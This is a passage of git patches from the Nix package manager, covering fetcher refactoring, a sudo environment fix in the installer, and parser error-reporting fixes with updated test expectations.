@@ -242,13 +242,12 @@ struct MercurialInputScheme : InputScheme
             });
         };
 
-        auto makeResult = [&](const Attrs & infoAttrs, StorePath && storePath)
-            -> std::pair
+        auto makeResult = [&](const Attrs & infoAttrs, const StorePath & storePath) -> StorePath
         {
             assert(input.getRev());
-            assert(!_input.getRev() || _input.getRev() == input.getRev());
+            assert(!origRev || origRev == input.getRev());
             input.attrs.insert_or_assign("revCount", getIntAttr(infoAttrs, "revCount"));
-            return {std::move(storePath), input};
+            return storePath;
         };
 
         if (input.getRev()) {
@@ -329,7 +328,7 @@ struct MercurialInputScheme : InputScheme
             {"revCount", (uint64_t) revCount},
         });
 
-        if (!_input.getRev())
+        if (!origRev)
             getCache()->add(
                 *store,
                 unlockedAttrs,
@@ -347,6 +346,15 @@ struct MercurialInputScheme : InputScheme
         return makeResult(infoAttrs, std::move(storePath));
     }
 
+    std::pair, Input> getAccessor(ref store, const Input & _input) const override
+    {
+        Input input(_input);
+
+        auto storePath = fetchToStore(store, input);
+
+        return {makeStorePathAccessor(store, storePath), input};
+    }
+
     bool isLocked(const Input & input) const override
     {
         return (bool) input.getRev();
diff --git a/src/libfetchers/path.cc b/src/libfetchers/path.cc
index 276fd1b36..6cc482ebf 100644
--- a/src/libfetchers/path.cc
+++ b/src/libfetchers/path.cc
@@ -1,6 +1,8 @@
 #include "fetchers.hh"
 #include "store-api.hh"
 #include "archive.hh"
+#include "fs-input-accessor.hh"
+#include "posix-source-accessor.hh"
 
 namespace nix::fetchers {
 
@@ -102,7 +104,7 @@ struct PathInputScheme : InputScheme
         throw Error("cannot fetch input '%s' because it uses a relative path", input.to_string());
     }
 
-    std::pair fetch(ref store, const Input & _input) override
+    std::pair, Input> getAccessor(ref store, const Input & _input) const override
     {
         Input input(_input);
         std::string absPath;
@@ -144,7 +146,7 @@ struct PathInputScheme : InputScheme
         }
         input.attrs.insert_or_assign("lastModified", uint64_t(mtime));
 
-        return {std::move(*storePath), input};
+        return {makeStorePathAccessor(store, *storePath), std::move(input)};
     }
 
     std::optional experimentalFeature() const override
diff --git a/src/nix/flake.cc b/src/nix/flake.cc
index 5fc3f4166..5e4269588 100644
--- a/src/nix/flake.cc
+++ b/src/nix/flake.cc
@@ -1050,7 +1050,7 @@ struct CmdFlakeArchive : FlakeCommand, MixJSON, MixDryRun
                     auto storePath =
                         dryRun
                         ? (*inputNode)->lockedRef.input.computeStorePath(*store)
-                        : (*inputNode)->lockedRef.input.fetch(store).first;
+                        : (*inputNode)->lockedRef.input.fetchToStore(store).first;
                     if (json) {
                         auto& jsonObj3 = jsonObj2[inputName];
                         jsonObj3["path"] = store->printStorePath(storePath);
diff --git a/src/nix/registry.cc b/src/nix/registry.cc
index 0346ec1e0..812429240 100644
--- a/src/nix/registry.cc
+++ b/src/nix/registry.cc
@@ -188,7 +188,9 @@ struct CmdRegistryPin : RegistryCommand, EvalCommand
         auto ref = parseFlakeRef(url);
         auto lockedRef = parseFlakeRef(locked);
         registry->remove(ref.input);
-        auto [tree, resolved] = lockedRef.resolve(store).input.fetch(store);
+        auto resolved = lockedRef.resolve(store).input.getAccessor(store).second;
+        if (!resolved.isLocked())
+            warn("flake '%s' is not locked", resolved.to_string());
         fetchers::Attrs extraAttrs;
         if (ref.subdir != "") extraAttrs["dir"] = ref.subdir;
         registry->add(ref.input, resolved, extraAttrs);

From 7161ef14a2f26fa4f1be9633de2f423492ee76c7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 <7226587+thufschmitt@users.noreply.github.com>
Date: Tue, 5 Mar 2024 08:07:58 +0100
Subject: [PATCH 569/654] Add a warning against carelessly changing the profile
 version number

Try to prevent the situation of https://github.com/NixOS/nix/issues/10109 from happening again in the future
---
 src/nix/profile.cc | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index d39a24d36..2bb29a67b 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -222,6 +222,8 @@ struct ProfileManifest
             es[name] = obj;
         }
         nlohmann::json json;
+        // Only upgrade with great care as changing it can break fresh installs
+        // like in https://github.com/NixOS/nix/issues/10109
         json["version"] = 3;
         json["elements"] = es;
         return json;

From 2a3451077677787eae176c72717817ba80738a5e Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Tue, 5 Mar 2024 14:35:05 +0100
Subject: [PATCH 570/654] package.nix: Apply
 OBJC_DISABLE_INITIALIZE_FORK_SAFETY workaround

This was previously already used in the launchd configuration for
nix-daemon.

(cherry picked from commit 855741aea57cd413a5da524169794a6790162d18)
---
 package.nix | 12 +++++++++---
 1 file changed, 9 insertions(+), 3 deletions(-)

diff --git a/package.nix b/package.nix
index a90973b4c..fa898e906 100644
--- a/package.nix
+++ b/package.nix
@@ -349,9 +349,15 @@ in {
 
   # Needed for tests if we are not doing a build, but testing existing
   # built Nix.
-  preInstallCheck = lib.optionalString (! doBuild) ''
-    mkdir -p src/nix-channel
-  '';
+  preInstallCheck =
+    lib.optionalString (! doBuild) ''
+      mkdir -p src/nix-channel
+    ''
+    # See https://github.com/NixOS/nix/issues/2523
+    # Occurs often in tests since https://github.com/NixOS/nix/pull/9900
+    + lib.optionalString stdenv.hostPlatform.isDarwin ''
+      export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES
+    '';
 
   separateDebugInfo = !stdenv.hostPlatform.isStatic;
 

From 686405ef416955621a89815e07cb64e1ee4f1495 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 <7226587+thufschmitt@users.noreply.github.com>
Date: Wed, 6 Mar 2024 22:36:37 +0100
Subject: [PATCH 571/654] Fix sudo in the darwin installer (#10128)

---
 scripts/install-multi-user.sh | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/scripts/install-multi-user.sh b/scripts/install-multi-user.sh
index 1dbb93bf9..4d6a1914e 100644
--- a/scripts/install-multi-user.sh
+++ b/scripts/install-multi-user.sh
@@ -69,16 +69,17 @@ readonly PROXY_ENVIRONMENT_VARIABLES=(
     NO_PROXY
 )
 
-SUDO_EXTRA_ENVIRONMENT_VARIABLES=()
+SUDO_KEPT_ENVIRONMENT_VARIABLES=""
 
 setup_sudo_extra_environment_variables() {
-    local i=${#SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}
     for variable in "${PROXY_ENVIRONMENT_VARIABLES[@]}"; do
         if [ "x${!variable:-}" != "x" ]; then
-            SUDO_EXTRA_ENVIRONMENT_VARIABLES[i]="$variable=${!variable}"
-            i=$((i + 1))
+            SUDO_KEPT_ENVIRONMENT_VARIABLES="$SUDO_KEPT_ENVIRONMENT_VARIABLES,$variable"
         fi
     done
+
+    # Required by the darwin installer
+    export SUDO_KEPT_ENVIRONMENT_VARIABLES
 }
 
 setup_sudo_extra_environment_variables
@@ -386,7 +387,7 @@ _sudo() {
     if is_root; then
         env "$@"
     else
-        sudo "${SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}" "$@"
+        sudo --preserve-env="$SUDO_KEPT_ENVIRONMENT_VARIABLES" "$@"
     fi
 }
 

From fe13d4a6e0d286d0ab8fcd8728bd41064dad69d0 Mon Sep 17 00:00:00 2001
From: link2xt 
Date: Wed, 6 Mar 2024 21:55:02 +0000
Subject: [PATCH 572/654] Make search.nixos.org link in quick start clickable

---
 doc/manual/src/quick-start.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/manual/src/quick-start.md b/doc/manual/src/quick-start.md
index 75853ced7..9eb7a3265 100644
--- a/doc/manual/src/quick-start.md
+++ b/doc/manual/src/quick-start.md
@@ -34,7 +34,7 @@ For more in-depth information you are kindly referred to subsequent chapters.
    lolcat: command not found
    ```
 
-1. Search for more packages on  to try them out.
+1. Search for more packages on [search.nixos.org](https://search.nixos.org/) to try them out.
 
 1. Free up storage space:
 

From d384ecd553aa997270b79ee98d02f7cf7e1849e6 Mon Sep 17 00:00:00 2001
From: pennae 
Date: Mon, 29 Jan 2024 06:19:23 +0100
Subject: [PATCH 573/654] keep copies of parser inputs that are in-memory only

the parser modifies its inputs, which means that sharing them between
the error context reporting system and the parser itself can confuse the
reporting system. usually this led to early truncation of error context
reports which, while not dangerous, can be quite confusing.
---
 src/libexpr/eval.cc                              | 16 +++++++++++-----
 .../lang/parse-fail-dup-attrs-1.err.exp          |  1 +
 .../lang/parse-fail-dup-attrs-2.err.exp          |  1 +
 .../lang/parse-fail-dup-attrs-3.err.exp          |  1 +
 .../lang/parse-fail-dup-attrs-4.err.exp          |  1 +
 .../lang/parse-fail-dup-attrs-7.err.exp          |  1 +
 .../lang/parse-fail-undef-var-2.err.exp          |  3 ++-
 tests/functional/lang/parse-fail-utf8.err.exp    |  3 ++-
 8 files changed, 20 insertions(+), 7 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 722ff6908..3d22723b3 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -2777,9 +2777,12 @@ Expr * EvalState::parseExprFromFile(const SourcePath & path, std::shared_ptr & staticEnv)
 {
-    auto s = make_ref(std::move(s_));
-    s->append("\0\0", 2);
-    return parse(s->data(), s->size(), Pos::String{.source = s}, basePath, staticEnv);
+    // NOTE this method (and parseStdin) must take care to *fully copy* their input
+    // into their respective Pos::Origin until the parser stops overwriting its input
+    // data.
+    auto s = make_ref(s_);
+    s_.append("\0\0", 2);
+    return parse(s_.data(), s_.size(), Pos::String{.source = s}, basePath, staticEnv);
 }
 
 
@@ -2791,12 +2794,15 @@ Expr * EvalState::parseExprFromString(std::string s, const SourcePath & basePath
 
 Expr * EvalState::parseStdin()
 {
+    // NOTE this method (and parseExprFromString) must take care to *fully copy* their
+    // input into their respective Pos::Origin until the parser stops overwriting its
+    // input data.
     //Activity act(*logger, lvlTalkative, "parsing standard input");
     auto buffer = drainFD(0);
     // drainFD should have left some extra space for terminators
     buffer.append("\0\0", 2);
-    auto s = make_ref(std::move(buffer));
-    return parse(s->data(), s->size(), Pos::Stdin{.source = s}, rootPath("."), staticBaseEnv);
+    auto s = make_ref(buffer);
+    return parse(buffer.data(), buffer.size(), Pos::Stdin{.source = s}, rootPath("."), staticBaseEnv);
 }
 
 
diff --git a/tests/functional/lang/parse-fail-dup-attrs-1.err.exp b/tests/functional/lang/parse-fail-dup-attrs-1.err.exp
index 6c3a3510c..ffb5198c1 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-1.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-1.err.exp
@@ -3,3 +3,4 @@ error: attribute 'x' already defined at «stdin»:1:3
             2|   y = 456;
             3|   x = 789;
              |   ^
+            4| }
diff --git a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
index fecdece20..4607a5d59 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
@@ -3,3 +3,4 @@ error: attribute 'x' already defined at «stdin»:9:5
             9|     x = 789;
            10|     inherit (as) x;
              |                 ^
+           11|   };
diff --git a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
index fecdece20..4607a5d59 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
@@ -3,3 +3,4 @@ error: attribute 'x' already defined at «stdin»:9:5
             9|     x = 789;
            10|     inherit (as) x;
              |                 ^
+           11|   };
diff --git a/tests/functional/lang/parse-fail-dup-attrs-4.err.exp b/tests/functional/lang/parse-fail-dup-attrs-4.err.exp
index f85ffea51..c98a8f8d0 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-4.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-4.err.exp
@@ -3,3 +3,4 @@ error: attribute 'services.ssh.port' already defined at «stdin»:2:3
             2|   services.ssh.port = 22;
             3|   services.ssh.port = 23;
              |   ^
+            4| }
diff --git a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
index 98cea9dae..2daddf380 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
@@ -3,3 +3,4 @@ error: attribute 'x' already defined at «stdin»:6:12
             6|     inherit x;
             7|     inherit x;
              |            ^
+            8|   };
diff --git a/tests/functional/lang/parse-fail-undef-var-2.err.exp b/tests/functional/lang/parse-fail-undef-var-2.err.exp
index a58d8dca4..393c454dd 100644
--- a/tests/functional/lang/parse-fail-undef-var-2.err.exp
+++ b/tests/functional/lang/parse-fail-undef-var-2.err.exp
@@ -1,5 +1,6 @@
 error: syntax error, unexpected ':', expecting '}'
        at «stdin»:3:13:
             2|
-            3|   f = {x, y :
+            3|   f = {x, y : ["baz" "bar" z "bat"]}: x + y;
              |             ^
+            4|
diff --git a/tests/functional/lang/parse-fail-utf8.err.exp b/tests/functional/lang/parse-fail-utf8.err.exp
index e83abdb9e..1c83f6eb3 100644
--- a/tests/functional/lang/parse-fail-utf8.err.exp
+++ b/tests/functional/lang/parse-fail-utf8.err.exp
@@ -1,4 +1,5 @@
 error: syntax error, unexpected invalid token, expecting end of file
        at «stdin»:1:5:
-            1| 123 
+            1| 123 é 4
              |     ^
+            2|

From 4147ecfb1c51f3fe3b4adcbd4e753fd487dab645 Mon Sep 17 00:00:00 2001
From: pennae 
Date: Mon, 29 Jan 2024 06:19:23 +0100
Subject: [PATCH 574/654] normalize formal order on ExprLambda::show

we already normalize attr order to lexicographic; doing the same for
formals makes sense. doubly so because the order of formals would
otherwise depend on the context of the expression, which is not quite as
useful as one might expect.
---
 doc/manual/rl-next/formal-order.md              | 7 +++++++
 src/libexpr/nixexpr.cc                          | 5 ++++-
 tests/functional/lang/parse-okay-subversion.exp | 2 +-
 3 files changed, 12 insertions(+), 2 deletions(-)
 create mode 100644 doc/manual/rl-next/formal-order.md

diff --git a/doc/manual/rl-next/formal-order.md b/doc/manual/rl-next/formal-order.md
new file mode 100644
index 000000000..12628e318
--- /dev/null
+++ b/doc/manual/rl-next/formal-order.md
@@ -0,0 +1,7 @@
+---
+synopsis: consistent order of lambda formals in printed expressions
+prs: 9874
+---
+
+Always print lambda formals in lexicographic order rather than the internal, creation-time based symbol order.
+This makes printed formals independent of the context they appear in.
diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc
index 4b805d710..9a8b9616b 100644
--- a/src/libexpr/nixexpr.cc
+++ b/src/libexpr/nixexpr.cc
@@ -149,7 +149,10 @@ void ExprLambda::show(const SymbolTable & symbols, std::ostream & str) const
     if (hasFormals()) {
         str << "{ ";
         bool first = true;
-        for (auto & i : formals->formals) {
+        // the natural Symbol ordering is by creation time, which can lead to the
+        // same expression being printed in two different ways depending on its
+        // context. always use lexicographic ordering to avoid this.
+        for (auto & i : formals->lexicographicOrder(symbols)) {
             if (first) first = false; else str << ", ";
             str << symbols[i.name];
             if (i.def) {
diff --git a/tests/functional/lang/parse-okay-subversion.exp b/tests/functional/lang/parse-okay-subversion.exp
index 2303932c4..32fbba3c5 100644
--- a/tests/functional/lang/parse-okay-subversion.exp
+++ b/tests/functional/lang/parse-okay-subversion.exp
@@ -1 +1 @@
-({ fetchurl, localServer ? false, httpServer ? false, sslSupport ? false, pythonBindings ? false, javaSwigBindings ? false, javahlBindings ? false, stdenv, openssl ? null, httpd ? null, db4 ? null, expat, swig ? null, j2sdk ? null }: assert (expat != null); assert (localServer -> (db4 != null)); assert (httpServer -> ((httpd != null) && ((httpd).expat == expat))); assert (sslSupport -> ((openssl != null) && (httpServer -> ((httpd).openssl == openssl)))); assert (pythonBindings -> ((swig != null) && (swig).pythonSupport)); assert (javaSwigBindings -> ((swig != null) && (swig).javaSupport)); assert (javahlBindings -> (j2sdk != null)); ((stdenv).mkDerivation { inherit expat httpServer javaSwigBindings javahlBindings localServer pythonBindings sslSupport; builder = /foo/bar; db4 = (if localServer then db4 else null); httpd = (if httpServer then httpd else null); j2sdk = (if javaSwigBindings then (swig).j2sdk else (if javahlBindings then j2sdk else null)); name = "subversion-1.1.1"; openssl = (if sslSupport then openssl else null); patches = (if javahlBindings then [ (/javahl.patch) ] else [ ]); python = (if pythonBindings then (swig).python else null); src = (fetchurl { md5 = "a180c3fe91680389c210c99def54d9e0"; url = "http://subversion.tigris.org/tarballs/subversion-1.1.1.tar.bz2"; }); swig = (if (pythonBindings || javaSwigBindings) then swig else null); }))
+({ db4 ? null, expat, fetchurl, httpServer ? false, httpd ? null, j2sdk ? null, javaSwigBindings ? false, javahlBindings ? false, localServer ? false, openssl ? null, pythonBindings ? false, sslSupport ? false, stdenv, swig ? null }: assert (expat != null); assert (localServer -> (db4 != null)); assert (httpServer -> ((httpd != null) && ((httpd).expat == expat))); assert (sslSupport -> ((openssl != null) && (httpServer -> ((httpd).openssl == openssl)))); assert (pythonBindings -> ((swig != null) && (swig).pythonSupport)); assert (javaSwigBindings -> ((swig != null) && (swig).javaSupport)); assert (javahlBindings -> (j2sdk != null)); ((stdenv).mkDerivation { inherit expat httpServer javaSwigBindings javahlBindings localServer pythonBindings sslSupport; builder = /foo/bar; db4 = (if localServer then db4 else null); httpd = (if httpServer then httpd else null); j2sdk = (if javaSwigBindings then (swig).j2sdk else (if javahlBindings then j2sdk else null)); name = "subversion-1.1.1"; openssl = (if sslSupport then openssl else null); patches = (if javahlBindings then [ (/javahl.patch) ] else [ ]); python = (if pythonBindings then (swig).python else null); src = (fetchurl { md5 = "a180c3fe91680389c210c99def54d9e0"; url = "http://subversion.tigris.org/tarballs/subversion-1.1.1.tar.bz2"; }); swig = (if (pythonBindings || javaSwigBindings) then swig else null); }))

From 1edd6fada53553b89847ac3981ac28025857ca02 Mon Sep 17 00:00:00 2001
From: pennae 
Date: Mon, 29 Jan 2024 06:19:23 +0100
Subject: [PATCH 575/654] report inherit attr errors at the duplicate name

previously we reported the error at the beginning of the binding
block (for plain inherits) or the beginning of the attr list (for
inherit-from), effectively hiding where exactly the error happened.

this also carries over to runtime positions of attributes in sets as
reported by unsafeGetAttrPos. we're not worried about this changing
observable eval behavior because it *is* marked unsafe, and the new
behavior is much more useful.
---
 doc/manual/rl-next/inherit-error-positions.md |  6 +++++
 src/libexpr/parser.y                          | 25 ++++++++++---------
 .../lang/eval-okay-inherit-attr-pos.exp       |  1 +
 .../lang/eval-okay-inherit-attr-pos.nix       | 12 +++++++++
 .../lang/parse-fail-dup-attrs-2.err.exp       |  4 +--
 .../lang/parse-fail-dup-attrs-3.err.exp       |  4 +--
 .../lang/parse-fail-dup-attrs-7.err.exp       |  6 ++---
 .../parse-fail-regression-20060610.err.exp    |  6 ++---
 8 files changed, 42 insertions(+), 22 deletions(-)
 create mode 100644 doc/manual/rl-next/inherit-error-positions.md
 create mode 100644 tests/functional/lang/eval-okay-inherit-attr-pos.exp
 create mode 100644 tests/functional/lang/eval-okay-inherit-attr-pos.nix

diff --git a/doc/manual/rl-next/inherit-error-positions.md b/doc/manual/rl-next/inherit-error-positions.md
new file mode 100644
index 000000000..643080e9e
--- /dev/null
+++ b/doc/manual/rl-next/inherit-error-positions.md
@@ -0,0 +1,6 @@
+---
+synopsis: fix duplicate attribute error positions for `inherit`
+prs: 9874
+---
+
+When an inherit caused a duplicate attribute error the position of the error was not reported correctly, placing the error with the inherit itself or at the start of the bindings block instead of the offending attribute name.
diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y
index b0aee7b41..9a543d636 100644
--- a/src/libexpr/parser.y
+++ b/src/libexpr/parser.y
@@ -87,6 +87,7 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char *
   nix::StringToken uri;
   nix::StringToken str;
   std::vector<nix::AttrName> * attrNames;
+  std::vector<std::pair<nix::AttrName, nix::PosIdx>> * inheritAttrs;
   std::vector<std::pair<nix::PosIdx, nix::Expr *>> * string_parts;
   std::vector<std::pair<nix::PosIdx, std::variant<nix::Expr *, nix::StringToken>>> * ind_string_parts;
 }
@@ -97,7 +98,8 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char *
 %type <attrs> binds
 %type <formals> formals
 %type <formal> formal
-%type <attrNames> attrs attrpath
+%type <attrNames> attrpath
+%type <inheritAttrs> attrs
 %type <string_parts> string_parts_interpolated
 %type <ind_string_parts> ind_string_parts
 %type <e> path_start string_parts string_attr
@@ -309,13 +311,12 @@ binds
   : binds attrpath '=' expr ';' { $$ = $1; state->addAttr($$, std::move(*$2), $4, state->at(@2)); delete $2; }
   | binds INHERIT attrs ';'
     { $$ = $1;
-      for (auto & i : *$3) {
+      for (auto & [i, iPos] : *$3) {
           if ($$->attrs.find(i.symbol) != $$->attrs.end())
-              state->dupAttr(i.symbol, state->at(@3), $$->attrs[i.symbol].pos);
-          auto pos = state->at(@3);
+              state->dupAttr(i.symbol, iPos, $$->attrs[i.symbol].pos);
           $$->attrs.emplace(
               i.symbol,
-              ExprAttrs::AttrDef(new ExprVar(CUR_POS, i.symbol), pos, ExprAttrs::AttrDef::Kind::Inherited));
+              ExprAttrs::AttrDef(new ExprVar(iPos, i.symbol), iPos, ExprAttrs::AttrDef::Kind::Inherited));
       }
       delete $3;
     }
@@ -325,14 +326,14 @@ binds
           $$->inheritFromExprs = std::make_unique<std::vector<Expr *>>();
       $$->inheritFromExprs->push_back($4);
       auto from = new nix::ExprInheritFrom(state->at(@4), $$->inheritFromExprs->size() - 1);
-      for (auto & i : *$6) {
+      for (auto & [i, iPos] : *$6) {
           if ($$->attrs.find(i.symbol) != $$->attrs.end())
-              state->dupAttr(i.symbol, state->at(@6), $$->attrs[i.symbol].pos);
+              state->dupAttr(i.symbol, iPos, $$->attrs[i.symbol].pos);
           $$->attrs.emplace(
               i.symbol,
               ExprAttrs::AttrDef(
-                  new ExprSelect(CUR_POS, from, i.symbol),
-                  state->at(@6),
+                  new ExprSelect(iPos, from, i.symbol),
+                  iPos,
                   ExprAttrs::AttrDef::Kind::InheritedFrom));
       }
       delete $6;
@@ -341,12 +342,12 @@ binds
   ;
 
 attrs
-  : attrs attr { $$ = $1; $1->push_back(AttrName(state->symbols.create($2))); }
+  : attrs attr { $$ = $1; $1->emplace_back(AttrName(state->symbols.create($2)), state->at(@2)); }
   | attrs string_attr
     { $$ = $1;
       ExprString * str = dynamic_cast<ExprString *>($2);
       if (str) {
-          $$->push_back(AttrName(state->symbols.create(str->s)));
+          $$->emplace_back(AttrName(state->symbols.create(str->s)), state->at(@2));
           delete str;
       } else
           throw ParseError({
@@ -354,7 +355,7 @@ attrs
               .pos = state->positions[state->at(@2)]
           });
     }
-  | { $$ = new AttrPath; }
+  | { $$ = new std::vector<std::pair<AttrName, PosIdx>>; }
   ;
 
 attrpath
diff --git a/tests/functional/lang/eval-okay-inherit-attr-pos.exp b/tests/functional/lang/eval-okay-inherit-attr-pos.exp
new file mode 100644
index 000000000..e87d037c6
--- /dev/null
+++ b/tests/functional/lang/eval-okay-inherit-attr-pos.exp
@@ -0,0 +1 @@
+[ { column = 17; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 4; } { column = 19; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 4; } { column = 21; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 5; } { column = 23; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 5; } ]
diff --git a/tests/functional/lang/eval-okay-inherit-attr-pos.nix b/tests/functional/lang/eval-okay-inherit-attr-pos.nix
new file mode 100644
index 000000000..017ab1d36
--- /dev/null
+++ b/tests/functional/lang/eval-okay-inherit-attr-pos.nix
@@ -0,0 +1,12 @@
+let
+  d = 0;
+  x = 1;
+  y = { inherit d x; };
+  z = { inherit (y) d x; };
+in
+  [
+    (builtins.unsafeGetAttrPos "d" y)
+    (builtins.unsafeGetAttrPos "x" y)
+    (builtins.unsafeGetAttrPos "d" z)
+    (builtins.unsafeGetAttrPos "x" z)
+  ]
diff --git a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
index 4607a5d59..3105e60de 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
@@ -1,6 +1,6 @@
 error: attribute 'x' already defined at «stdin»:9:5
-       at «stdin»:10:17:
+       at «stdin»:10:18:
             9|     x = 789;
            10|     inherit (as) x;
-             |                 ^
+             |                  ^
            11|   };
diff --git a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
index 4607a5d59..3105e60de 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
@@ -1,6 +1,6 @@
 error: attribute 'x' already defined at «stdin»:9:5
-       at «stdin»:10:17:
+       at «stdin»:10:18:
             9|     x = 789;
            10|     inherit (as) x;
-             |                 ^
+             |                  ^
            11|   };
diff --git a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
index 2daddf380..4e0a48eff 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
@@ -1,6 +1,6 @@
-error: attribute 'x' already defined at «stdin»:6:12
-       at «stdin»:7:12:
+error: attribute 'x' already defined at «stdin»:6:13
+       at «stdin»:7:13:
             6|     inherit x;
             7|     inherit x;
-             |            ^
+             |             ^
             8|   };
diff --git a/tests/functional/lang/parse-fail-regression-20060610.err.exp b/tests/functional/lang/parse-fail-regression-20060610.err.exp
index d8875a6a5..6ae7c01bf 100644
--- a/tests/functional/lang/parse-fail-regression-20060610.err.exp
+++ b/tests/functional/lang/parse-fail-regression-20060610.err.exp
@@ -1,6 +1,6 @@
 error: undefined variable 'gcc'
-       at «stdin»:8:12:
-            7|
+       at «stdin»:9:13:
             8|   body = ({
-             |            ^
             9|     inherit gcc;
+             |             ^
+           10|   }).gcc;

From 2be6b143289e5479cc4a2667bb84e879116c2447 Mon Sep 17 00:00:00 2001
From: pennae 
Date: Mon, 29 Jan 2024 06:19:23 +0100
Subject: [PATCH 576/654] match line endings used by parser and error reports

the parser treats a plain \r as a newline, error reports do not. this
can lead to interesting divergences if anything makes use of this
feature, with error reports pointing to wrong locations in the input (or
even outside the input altogether).
---
 src/libutil/position.cc                       | 55 +++++++++++--------
 src/libutil/position.hh                       | 42 ++++++++++++++
 tests/functional/lang/eval-fail-eol-1.err.exp |  6 ++
 tests/functional/lang/eval-fail-eol-1.nix     |  3 +
 tests/functional/lang/eval-fail-eol-2.err.exp |  6 ++
 tests/functional/lang/eval-fail-eol-2.nix     |  2 +
 tests/functional/lang/eval-fail-eol-3.err.exp |  6 ++
 tests/functional/lang/eval-fail-eol-3.nix     |  3 +
 8 files changed, 99 insertions(+), 24 deletions(-)
 create mode 100644 tests/functional/lang/eval-fail-eol-1.err.exp
 create mode 100644 tests/functional/lang/eval-fail-eol-1.nix
 create mode 100644 tests/functional/lang/eval-fail-eol-2.err.exp
 create mode 100644 tests/functional/lang/eval-fail-eol-2.nix
 create mode 100644 tests/functional/lang/eval-fail-eol-3.err.exp
 create mode 100644 tests/functional/lang/eval-fail-eol-3.nix

diff --git a/src/libutil/position.cc b/src/libutil/position.cc
index b39a5a1d4..724e560b7 100644
--- a/src/libutil/position.cc
+++ b/src/libutil/position.cc
@@ -29,32 +29,17 @@ std::optional Pos::getCodeLines() const
         return std::nullopt;
 
     if (auto source = getSource()) {
-
-        std::istringstream iss(*source);
-        // count the newlines.
-        int count = 0;
-        std::string curLine;
-        int pl = line - 1;
-
+        LinesIterator lines(*source), end;
         LinesOfCode loc;
 
-        do {
-            std::getline(iss, curLine);
-            ++count;
-            if (count < pl)
-                ;
-            else if (count == pl) {
-                loc.prevLineOfCode = curLine;
-            } else if (count == pl + 1) {
-                loc.errLineOfCode = curLine;
-            } else if (count == pl + 2) {
-                loc.nextLineOfCode = curLine;
-                break;
-            }
-
-            if (!iss.good())
-                break;
-        } while (true);
+        if (line > 1)
+            std::advance(lines, line - 2);
+        if (lines != end && line > 1)
+            loc.prevLineOfCode = *lines++;
+        if (lines != end)
+            loc.errLineOfCode = *lines++;
+        if (lines != end)
+            loc.nextLineOfCode = *lines++;
 
         return loc;
     }
@@ -109,4 +94,26 @@ std::ostream & operator<<(std::ostream & str, const Pos & pos)
     return str;
 }
 
+void Pos::LinesIterator::bump(bool atFirst)
+{
+    if (!atFirst) {
+        pastEnd = input.empty();
+        if (!input.empty() && input[0] == '\r')
+            input.remove_prefix(1);
+        if (!input.empty() && input[0] == '\n')
+            input.remove_prefix(1);
+    }
+
+    // nix line endings are not only \n as eg std::getline assumes, but also
+    // \r\n **and \r alone**. not treating them all the same causes error
+    // reports to not match with line numbers as the parser expects them.
+    auto eol = input.find_first_of("\r\n");
+
+    if (eol > input.size())
+        eol = input.size();
+
+    curLine = input.substr(0, eol);
+    input.remove_prefix(eol);
+}
+
 }
diff --git a/src/libutil/position.hh b/src/libutil/position.hh
index a184997ed..9bdf3b4b5 100644
--- a/src/libutil/position.hh
+++ b/src/libutil/position.hh
@@ -67,6 +67,48 @@ struct Pos
     bool operator==(const Pos & rhs) const = default;
     bool operator!=(const Pos & rhs) const = default;
     bool operator<(const Pos & rhs) const;
+
+    struct LinesIterator {
+        using difference_type = size_t;
+        using value_type = std::string_view;
+        using reference = const std::string_view &;
